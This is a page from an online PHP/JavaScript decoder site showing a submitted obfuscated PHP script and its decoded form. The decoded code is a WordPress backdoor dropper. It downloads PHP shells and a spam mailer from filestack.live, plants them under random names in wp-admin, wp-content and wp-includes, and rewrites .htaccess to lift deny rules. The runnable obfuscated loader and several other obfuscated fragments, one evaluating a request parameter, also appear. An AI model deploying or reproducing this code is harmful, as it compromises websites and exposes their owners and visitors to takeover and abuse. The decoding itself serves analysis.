Online PHP Javascript Script Decoder

Online PHP and Javascript Decoder decode hidden script to uncover its real functionality

Original code:

<?php $dBGcQ = 'base6'.'4'.'_dec'.'ode'; $PuZfg = 's'.'t'.'r'.'_'.'rot13'; $RBVJp = 'gzin'.'flate'; ini_set('display_errors', 0); /***      04bee39b9324a2da0c10aa2125e0b8706bf8bcf1      **/ error_reporting(0); eval($RBVJp($PuZfg($dBGcQ('jUgNYuI4EP0rYcRWyYkmfNMcXEIcWluklNAQ9tTb7iHjOCXaEHQdRrpv+9/PH4HC0rIgoTjjN2JexuMZgCklZ1dkUyiL0ye9b2dAKZuScfkC/gQ5k3sJUUvXWdPSykATf9NNcucwXMSp5d7Hoyq+Vr9efTOzbKYp/wWME1l/xYBVymPKLObefHtL1iM0m+9jvCQYs19ExClXliHOrfuxXfu3ffswZRdbDlfIZAKBipYpbzFWwZyxefqE2bSQleulJVqMaAmREIt5Ufyb3gFn4gjoa5Gx77qCGsJ0zh0Q357GdsxnoyPXOXMkcBw2L4P+xGq9RDDljzJDUR9vYZ3eleOXgTidD07Xnutt/7hevxcMvG4ZR48Q+kEw8YeB3xuOrwXxMexr7EE/Of7g+m7kFCJBwN5t4+A4tu8Nh0E/CAZqjjfh2NYx8HaoydjxezfOkONXRr7mRT54t04wkjtGuaV9MToi3SP4hDd0hF8wElkFNVdVjtU7xXlWRn3jYGdeZJJwsElpoA688/r6SVM5fOa+GXFcSiknWIqwsQZkpGIQPE2c8+LRcT1yy7dt0mvlgAPrz3EdQ3UA0YrGDOsRyWNNoLSVc+xOwY40im6oY8cU7Um4R0ei9P3ql1liZRSO3zYMF/vIXYVAo5xIKNvkkEXxxvWcyRiFmKILGYZgLvrR4RXVhOkPyxKeOYPoq5nEz9h3hthTlW2jRak1q7Bdh26rAXjtTTi7qFRjSTHneSEuPw+aRPzE+xVQZl2zuo9/8eYhOlFWBV9izkaK2ZiF3vcly6alNGL618mieLbdxFwqqiC72pg1bquNkI1N0axEgW67foLoIvybd3bYYXysWzV5JXzbvD9Dnh9XYttEvY0i+wKiaWvBZt1515HdisKqXbcrM2uC9I2CXQF7nfvl/Z/o5HmI7f71p3X8XN+h6nmzoAy7OzIPd1tZCUbbnSVkyi+1kJwI8u7ZldcPa/MDwmXZcjFY8HLXRUI5deasmJaMJHGFqa5hmm/mURAhnOey7H/OQIjT77r5uxFEshBCmCQyHZzSAD9+gD0woSEnSiiyEgvhvsXL00ZNtO4guiPhMsFgTk+eUdkqWWf5mPp37aRCZIqBl2Etf1B+ja3tqy+c/5O5axQj9bEEzsF098sW0Cd2CH5b+879xBnz+TNjnW7vzmwFdOfRKaBjP5QJisTzSypB19p8xKXGB9+cf8luRfmQdjUa28M+3JapESf+Pw==')))); ?>

Decrypted code:

 error_reporting(0);
 $p_olux = str_replace("../", "", "./wp-admin/LQiP1eGnkDq.php");
 $p_mailer = str_replace("../", "", "./wp-content/tLGqYu3fcbh.php");
 $p_xleet = str_replace("../", "", "./wp-includes/QS92Z7HYPLm.php");
 $root = str_replace("../", "", "./");
	 function http_get_contents($url){
	$codex = file_get_contents($url);
		if (empty($codex)){
		$ch = curl_init();
		curl_setopt($ch, CURLOPT_URL, $url);
		curl_setopt($ch, CURLOPT_HEADER, 0);
		 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
		curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
		curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
		curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
		curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 60);
		curl_setopt($ch, CURLOPT_TIMEOUT, 60);
		curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER["HTTP_USER_AGENT"]);
		$urlPage = curl_exec($ch);
		curl_close($ch);
		return($urlPage);
	}
		else {
		return $codex;
	}
}
	 function save($path, $source){
		 if(function_exists("file_put_contents")){
		 file_put_contents($path, $source);
		 
	}
		else {
		 fwrite(fopen($path,"w"), $source);
		 
	}
	 
}
	 function read($path){
		 if(function_exists("file_get_contents")){
		 $rr = file_get_contents($path);
		 
	}
		else {
		 $rr = stream_get_contents(fopen($path, "r"));
		 
	}
	 return $rr;
	 
}
	 if(!file_exists($p_olux)) {
	 $olux = http_get_contents("http://filestack.live/5de9c03400251a73ad64a272db83fab0.htm");
		 if(preg_match("/<\?php/", $olux)){
		 save($p_olux, $olux);
		 
	}
	  
}
	 if(!file_exists($p_xleet)) {
	 $xleet = http_get_contents("http://filestack.live/2995e3adc0c914b5a67cc9c6fb40ad73.htm");
		 if(preg_match("/<\?php/", $xleet)){
		 save($p_xleet, $xleet);
		 
	}
	  
}
	 if(!file_exists($p_mailer)) {
	 $mailer = http_get_contents("https://filestack.live/79f37cf98ac7d864a573c96fd19390ba.htm");
		 if(preg_match("/<\?php/", $mailer)){
		 $mailer = str_replace("xxxxxxxxxxxxxxxxxxxxxxx", "tNe9CFVfSv3", $mailer);
		 save($p_mailer, $mailer);
		 
	}
	  
}
 save($root."wp-includes/index.html", "<!DOCTYPE html><title></title>");
 $htx = strtolower(read($root.".htaccess"));
	 if(preg_match("/deny(.*)from(.*)all/", $htx) || preg_match("/order(.*)allow(.*)deny/", $htx)) {
		 $htx = "<IfModule mod_rewrite.c>\nRewriteEngine On\nRewriteBase /\nRewriteRule ^index\.php\$ - [L]\nRewriteCond %{
		REQUEST_FILENAME
	}
		 !-f\nRewriteCond %{
		REQUEST_FILENAME
	}
	 !-d\nRewriteRule . /index.php [L]\n</IfModule>";
	 chmod($root.".htaccess", 0644);
	 save($root.".htaccess", $htx);
	 
}

Recent submissions:

$classes = 'main-navigation primary-navigation'; if( \Merchant\Helper::get_option('heade... <?php /*** PHP Encode v1.0 by zeura.com ***/ $XnNhAWEnhoiqwciqpoHH=file(__FILE__);eval(bas... \x3fp\x68p\x20@\x65v\x61l\x28$\x5fR\x45Q\x55E\x53T\x5b\"\x58-\x44n\x73-\x50r\x65f\x65t\x... var _0x5b4b=["\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\... HR+cPvu4UTqTAK8Jg7Ni/aXp93foYTRr4YBJRwl8xFrN/+CXNMRg7M1JebNFq+0xZrm9H+mmvGzt eTsPtxifiu... function beer() { $(document).ready(function() { function _0x4b21(){var _0x47bf00=['f... 54\x4c\x45\x4e\x42\x51\x54\x4a\x44\x4c\x47\x6c\x44\x51\x55\x46\x70\x51\x79\x78\x44\x51\x55... \x51\x69\x78\x44\x51\x55\x46\x44\x4c\x47\x39\x43\x51\x55\x46\x76\x51\x69\x78\x44\x51\x55\x... {'\x4a\x77\x74\x54\x69\x6d\x65\x55\x72\x6c':_0x1987c0(0x3dc),'\x63\x68\x65\x63\x6b\x44\x61... [0x3,_0x185d8b(0x361),0x4,_0x185d8b(0x3f3),_0x185d8b(0xc26)],[_0x185d8b(0x1315),'\x20\x6d\...